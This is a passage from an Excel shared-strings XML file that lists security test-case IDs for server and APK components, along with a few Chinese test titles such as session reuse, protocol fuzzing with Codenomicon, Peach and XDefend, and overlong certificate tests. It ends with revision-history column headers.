  </si>
  <si>
    <t>SER_SECR_020109_165</t>
  </si>
  <si>
    <t>SER_SECR_020109_166</t>
  </si>
  <si>
    <t>SER_SECR_020109_167</t>
  </si>
  <si>
    <t>SER_SECR_020109_168</t>
  </si>
  <si>
    <t>SER_SECR_020109_169</t>
  </si>
  <si>
    <t>SER_SECR_020109_170</t>
  </si>
  <si>
    <t>SER_SECR_020109_171</t>
  </si>
  <si>
    <t>SER_SECR_020109_172</t>
  </si>
  <si>
    <t>SER_SECR_020109_173</t>
  </si>
  <si>
    <t>SER_SECR_020109_174</t>
  </si>
  <si>
    <t>SER_SECR_020109_175</t>
  </si>
  <si>
    <t>SER_SECR_020109_176</t>
  </si>
  <si>
    <t>SER_SECR_020109_177</t>
  </si>
  <si>
    <t>SER_SECR_020109_178</t>
  </si>
  <si>
    <t>SER_SECR_020109_179</t>
  </si>
  <si>
    <t>SER_SECR_020109_180</t>
  </si>
  <si>
    <t>SER_SECR_020109_181</t>
  </si>
  <si>
    <t>SER_SECR_020109_182</t>
  </si>
  <si>
    <t>SER_SECR_020109_183</t>
  </si>
  <si>
    <t>SER_SECR_020109_184</t>
  </si>
  <si>
    <t>SER_SECR_020109_185</t>
  </si>
  <si>
    <t>SER_SECR_020109_186</t>
  </si>
  <si>
    <t>SER_SECR_020109_187</t>
  </si>
  <si>
    <t>SER_SECR_020109_188</t>
  </si>
  <si>
    <t>SER_SECR_020109_189</t>
  </si>
  <si>
    <t>SER_SECR_020109_190</t>
  </si>
  <si>
    <t>SER_SECR_020109_191</t>
  </si>
  <si>
    <t>SER_SECR_020109_192</t>
  </si>
  <si>
    <t>SER_SECR_020109_193</t>
  </si>
  <si>
    <t>SER_SECR_020109_194</t>
  </si>
  <si>
    <t>SER_SECR_020109_195</t>
  </si>
  <si>
    <t>SER_SECR_020109_196</t>
  </si>
  <si>
    <t>SER_SECR_020109_197</t>
  </si>
  <si>
    <t>SER_SECR_020110_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020110_002</t>
  </si>
  <si>
    <t>SER_SECR_020110_003</t>
  </si>
  <si>
    <t>SER_SECR_020110_004</t>
  </si>
  <si>
    <t>SER_SECR_020110_005</t>
  </si>
  <si>
    <t>SER_SECR_020110_006</t>
  </si>
  <si>
    <t>SER_SECR_020110_007</t>
  </si>
  <si>
    <t>SER_SECR_020110_008</t>
  </si>
  <si>
    <t>SER_SECR_020110_009</t>
  </si>
  <si>
    <t>SER_SECR_020110_010</t>
  </si>
  <si>
    <t>SER_SECR_020110_011</t>
  </si>
  <si>
    <t>SER_SECR_020111_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020111_002</t>
  </si>
  <si>
    <t>SER_SECR_020111_003</t>
  </si>
  <si>
    <t>SER_SECR_020111_004</t>
  </si>
  <si>
    <t>SER_SECR_020111_005</t>
  </si>
  <si>
    <t>SER_SECR_020111_006</t>
  </si>
  <si>
    <t>SER_SECR_020111_007</t>
  </si>
  <si>
    <t>SER_SECR_020111_008</t>
  </si>
  <si>
    <t>SER_SECR_020111_009</t>
  </si>
  <si>
    <t>SER_SECR_020111_010</t>
  </si>
  <si>
    <t>SER_SECR_020111_011</t>
  </si>
  <si>
    <t>SER_SECR_020111_012</t>
  </si>
  <si>
    <t>SER_SECR_020111_013</t>
  </si>
  <si>
    <t>SER_SECR_020111_014</t>
  </si>
  <si>
    <t>SER_SECR_020111_015</t>
  </si>
  <si>
    <t>SER_SECR_020111_016</t>
  </si>
  <si>
    <t>SER_SECR_020111_017</t>
  </si>
  <si>
    <t>SER_SECR_020111_018</t>
  </si>
  <si>
    <t>SER_SECR_020111_019</t>
  </si>
  <si>
    <t>SER_SECR_020111_020</t>
  </si>
  <si>
    <t>SER_SECR_020111_021</t>
  </si>
  <si>
    <t>SER_SECR_020111_022</t>
  </si>
  <si>
    <t>SER_SECR_020112_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020112_002</t>
  </si>
  <si>
    <t>SER_SECR_020112_003</t>
  </si>
  <si>
    <t>SER_SECR_020112_004</t>
  </si>
  <si>
    <t>SER_SECR_020112_005</t>
  </si>
  <si>
    <t>SER_SECR_020112_006</t>
  </si>
  <si>
    <t>SER_SECR_020112_007</t>
  </si>
  <si>
    <t>SER_SECR_020112_008</t>
  </si>
  <si>
    <t>SER_SECR_020112_009</t>
  </si>
  <si>
    <t>SER_SECR_020112_010</t>
  </si>
  <si>
    <t>SER_SECR_020112_011</t>
  </si>
  <si>
    <t>SER_SECR_020112_012</t>
  </si>
  <si>
    <t>SER_SECR_020112_013</t>
  </si>
  <si>
    <t>SER_SECR_020112_014</t>
  </si>
  <si>
    <t>SER_SECR_020112_015</t>
  </si>
  <si>
    <t>SER_SECR_020112_016</t>
  </si>
  <si>
    <t>SER_SECR_020112_017</t>
  </si>
  <si>
    <t>SER_SECR_020112_018</t>
  </si>
  <si>
    <t>SER_SECR_020112_019</t>
  </si>
  <si>
    <t>SER_SECR_020112_020</t>
  </si>
  <si>
    <t>SER_SECR_020112_021</t>
  </si>
  <si>
    <t>SER_SECR_020112_022</t>
  </si>
  <si>
    <t>SER_SECR_020112_023</t>
  </si>
  <si>
    <t>SER_SECR_020112_024</t>
  </si>
  <si>
    <t>SER_SECR_020112_025</t>
  </si>
  <si>
    <t>SER_SECR_020112_026</t>
  </si>
  <si>
    <t>SER_SECR_020112_027</t>
  </si>
  <si>
    <t>SER_SECR_020112_028</t>
  </si>
  <si>
    <t>SER_ SECNR_020201_001</t>
  </si>
  <si>
    <t>SER_ SECNR_020201_002</t>
  </si>
  <si>
    <t>SER_ SECNR_020201_003</t>
  </si>
  <si>
    <t>SER_ SECNR_020201_004</t>
  </si>
  <si>
    <t>SER_ SECNR_020201_005</t>
  </si>
  <si>
    <t>SER_ SECNR_020201_006</t>
  </si>
  <si>
    <t>006 协议版本号一致性校验</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>005 会话重用攻击测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>001 codenomicon测试协议健壮性</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>002 peach测试协议健壮性</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>003 xdefend测试协议健壮性</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>004 超长证书攻击测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_ SECNR_020202_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_ SECNR_020202_002</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_003</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_004</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_005</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_006</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_007</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_008</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_009</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_010</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_011</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_012</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_013</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_014</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_015</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_016</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_017</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_018</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_019</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_020</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_021</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_022</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_023</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_024</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_025</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_026</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_027</t>
  </si>
  <si>
    <t>SER_ SECNR_020202_028</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030101_001</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030101_002</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030101_003</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030101_004</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030101_005</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030101_006</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010201_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010201_002</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010201_003</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010201_004</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010201_005</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010202_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010203_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010204_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010204_002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010205_002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010205_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010206_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010206_002</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010206_003</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010206_004</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010207_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010207_002</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010207_003</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010208_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010208_002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010209_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010209_002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010210_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010211_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_03010211_002</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010211_003</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010211_004</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010211_005</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010211_006</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010211_007</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010211_008</t>
  </si>
  <si>
    <t>PUB_APK_SEC_03010211_009</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030103_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_030103_002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_002</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_003</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_004</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_005</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_006</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_007</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_008</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_009</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_010</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_011</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_012</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_013</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_014</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_015</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_016</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_017</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_018</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_019</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_020</t>
  </si>
  <si>
    <t>PUB_APK_SEC_030104_021</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030201_001</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030201_002</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030201_003</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030201_004</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030201_005</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030201_006</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030201_007</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030201_008</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030201_009</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030201_010</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030201_011</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030201_012</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020201_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020201_002</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020201_003</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020202_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020202_002</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020202_003</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020202_004</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020202_005</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020202_006</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020202_007</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020203_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020203_002</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020203_003</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020204_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020204_002</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020204_003</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020204_004</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020204_005</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020205_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020206_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020207_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020208_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020209_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020208_002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020209_002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020210_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020211_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020211_002</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020211_003</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020211_004</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020211_005</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020211_006</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020211_007</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020211_008</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020211_009</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020211_010</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020212_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020212_002</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020212_003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020213_002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020213_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020214_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020214_002</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020214_003</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020214_004</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020214_005</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020215_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020215_002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020216_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020216_002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020217_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_002</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_003</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_004</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_005</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_006</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_007</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_008</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_009</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_010</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_011</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_012</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_013</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_014</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_015</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_016</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_017</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_018</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_019</t>
  </si>
  <si>
    <t>PUB_SER_SEC_03020218_020</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030203_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_030203_002</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030203_003</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_002</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_003</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_004</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_005</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_006</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_007</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_008</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_009</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_010</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_011</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_012</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_013</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_014</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_015</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_016</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_017</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_018</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_019</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_020</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_021</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_022</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_023</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_024</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_025</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_026</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_027</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_028</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_029</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_030</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_031</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_032</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_033</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_034</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_035</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_036</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_037</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_038</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_039</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_040</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_041</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_042</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_043</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_044</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_045</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_046</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_047</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_048</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_049</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_050</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_051</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_052</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_053</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_054</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_055</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_056</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_057</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_058</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_059</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_060</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_061</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_062</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_063</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_064</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_065</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_067</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_068</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_069</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_070</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_071</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_072</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_073</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_074</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_075</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_076</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_077</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_078</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_079</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_080</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_081</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_082</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_083</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_084</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_085</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_087</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_088</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_089</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_090</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_091</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_092</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_093</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_094</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_095</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_096</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_097</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_098</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_099</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_100</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_101</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_102</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_103</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_104</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_105</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_106</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_107</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_108</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_109</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_110</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_111</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_112</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_113</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_114</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_115</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_116</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_117</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_118</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_119</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_120</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_121</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_122</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_123</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_124</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_125</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_126</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_127</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_128</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_129</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_130</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_131</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_132</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_133</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_134</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_135</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_136</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_137</t>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_138</t>
  </si>
  <si>
    <t>序号</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>日期</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>修改描述</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>版本号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用例总规模</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>设计人</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>第1个版本</t>
